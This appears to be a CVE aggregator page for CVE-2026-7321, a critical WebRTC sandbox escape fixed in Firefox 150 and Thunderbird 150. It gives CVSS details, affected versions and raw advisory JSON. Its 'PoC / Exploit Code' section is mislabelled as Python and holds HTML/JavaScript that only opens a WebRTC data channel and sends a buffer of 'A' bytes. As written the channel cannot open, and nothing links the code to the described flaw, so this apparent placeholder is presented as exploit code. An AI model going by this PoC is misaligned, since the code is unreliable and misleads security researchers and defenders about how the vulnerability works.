Security Vulnerability Report
中文
CVE-2026-7321 CVSS 9.6 CRITICAL

CVE-2026-7321

Published: 2026-04-28 15:16:38
Last Modified: 2026-05-01 17:54:05

Description

Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox ESR 140.10.1, and Thunderbird 140.10.1.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 150
Mozilla Firefox ESR < 140.10.1
Mozilla Thunderbird < 150
Mozilla Thunderbird ESR < 140.10.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- // PoC Concept for CVE-2026-7321: WebRTC Sandbox Escape // This script attempts to trigger the boundary condition vulnerability. // Usage: Open in a vulnerable version of Firefox. --> <html> <head><title>CVE-2026-7321 PoC</title></head> <body> <script> // Create a PeerConnection to initialize WebRTC Networking const pc = new RTCPeerConnection(); // Create a Data Channel to send data const dc = pc.createDataChannel("trigger"); dc.onopen = function() { console.log("[+] Channel open, sending payload..."); // Construct a payload to potentially hit incorrect boundary conditions // Note: Real exploitation requires precise memory layout control const buffer = new ArrayBuffer(0x1000); const view = new Uint8Array(buffer); view.fill(0x41); // Fill with 'A' try { dc.send(buffer); console.log("[+] Payload sent."); } catch(e) { console.log("[-] Send failed: " + e); } }; // Start the connection process pc.createOffer().then(offer => pc.setLocalDescription(offer)); </script> <p>Check console for PoC execution status.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7321", "sourceIdentifier": "[email protected]", "published": "2026-04-28T15:16:37.550", "lastModified": "2026-05-01T17:54:04.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox ESR 140.10.1, and Thunderbird 140.10.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.10.1", "matchCriteriaId": "0772C464-37C8-4124-AAFC-66D7C1BEA6DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0", "matchCriteriaId": "67B01D49-66FA-4C76-9EB4-2B8CD61FBEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.10.1", "matchCriteriaId": "1E82C76E-35A0-4513-A8A8-D20DAF8C7F4B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0", "matchCriteriaId": "5DDDA58D-2B1E-4956-9CC2-45B3017F3F0B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2029461", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-30/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-33/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-36/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-39/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}